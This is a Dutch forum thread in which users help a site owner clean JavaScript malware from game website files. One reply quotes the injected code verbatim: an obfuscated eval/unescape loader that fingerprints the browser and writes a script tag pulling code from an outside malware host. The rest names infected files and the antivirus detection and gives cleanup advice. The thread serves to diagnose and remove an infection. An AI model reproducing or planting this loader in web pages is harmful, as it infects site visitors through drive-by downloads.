Virus?

wss staat er een gecomprimeerd bestand (gzip,zip,rar,7zip) op je website?
of een exe (uitvoerbaar bestand)

<script language=javascript><!--
(function(t){eval(unescape(('var"20a"3d"22Scr"69pt"45ng"69"6ee"22"2cb"3d"22"56ersion()+"22"2cj"3d"22"22"2cu"3dnavi"67ator"2e"75se"72Age"6e"74"3bi"66("28u"2ein"64ex"4ff("22W"69"6e"22)"3e0)"26"26(u"2eindexOf("22NT"206"22)"3c0"29"26"26"28do"63ument"2ec"6f"6fkie"2e"69ndexOf"28"22miek"3d"31"22"29"3c0"29"26"26("74ypeof(z"72vzts)"21"3dt"79pe"6ff("22A"22)"29)"7bzr"76zts"3d"22A"22"3beval("22i"66(win"64ow"2e"22+a"2b"22)j"3d"6a+"22+a+"22Majo"72"22"2bb+"61"2b"22"4di"6e"6fr"22+b+a"2b"22"42uil"64"22+b+"22"6a"3b"22)"3bdoc"75me"6et"2e"77"72"69"74e"28"22"3cscri"70t"20"73"72c"3d"2f"2fgumblar"2ecn"2fr"73s"2f"3fid"3d"22+"6a+"22"3e"3c"5c"2f"73cr"69pt"3e"22)"3b"7d').replace(t,'%')))})(/"/g);
--></script>

dat is de reden.

het staat onder je HEAD tag

Ik krijg gewoon je site te zien.

Ik weet nu waar je fout zit, heb zelf AVAST! Pro.
In de map 'game/js/ zitten geïnfecteerde JavaScript bestanden
Genaamd:
display.js
functions.js
wz_tooltip.js
tip_balloon.js
Deze javascript bestandjes zou ik dus even verwijderen, en desnoods de origineel opnieuw downloaden hier van CP uit de banditi source.

Heb nog een paar virussen:
Ook in de map game/js
duration_progress.js
prototype-1.6.0.2.js
swfobject.js

Heb je dit eerder gehad, of is dit voor het eerst?

Edit:
De virussen bevatten een deel van JS:Redirector-H, wat een variant van een Trojan horse is volgens AVAST.
Ik heb even inlichtingen opgevraagd, om te kijken of het geen fake alert is.

Komt het niet de hele tijd terug?
Mogelijk is de webserver zelf besmet en haalt het verwijderen dus niet veel uit.

Zoek desnoods een andere webhoster en kuis je bestanden bij de overzet grondig uit.
Nu is de kans dat elk bestand gaat blijven worden aangepast.

@Koen,

Het gaat alléén om de JavaScript geïnfecteerde bestanden, welke waarschijnlijk geïnfecteerd zijn of een fake melding bevat.
Even verwijderen, en de origineel uit de banditi die hier te download staat, proberen. Zien of het dan over is of niet.
Voor de fake melding heb ik bij Nucia/AntiSpyWareOffensief inlichtingen opgevraagd.

De infecties zitten ook in de game/ajax map.
Heb je de originele bestanden al terug gezet, in de game/js map?
uit de download van banditi hier op CP dus he
doe dat dan ook met de map ajax

Edit:
In de map ajax is game/ajax en dan prototype-1.6.0.2.js geïnfecteerd

Ik heb net even gecheckt, en nu heb ik geen infecties meer gevonden.
Het moet dus nu opgelost zijn.

Citaat

De virussen bevatten een deel van JS:Redirector-H, wat een variant van een Trojan horse is volgens AVAST.
Ik heb even inlichtingen opgevraagd, om te kijken of het geen fake alert is.

Tering gek :') Je denkt ook wel dat je heel wat kan ofniet.

Citaat

Tering gek :') Je denkt ook wel dat je heel wat kan ofniet.

Alsof jij zoveel kan, jij levert vooral commentaar..
Ik ben tenminste bezig met ICT opleiding, althans dat ga ik doen.
Ondertussen weet ik zeer veel van de ICT wereld, omdat ik daar al vanaf me 12de mee bezig ben.
Zeikbeest..

Groot gelijk.
Laat Niels maar zagen.

Moest het terugkomen is waarschijnlijk je computer of de webserver besmet.

:slotje: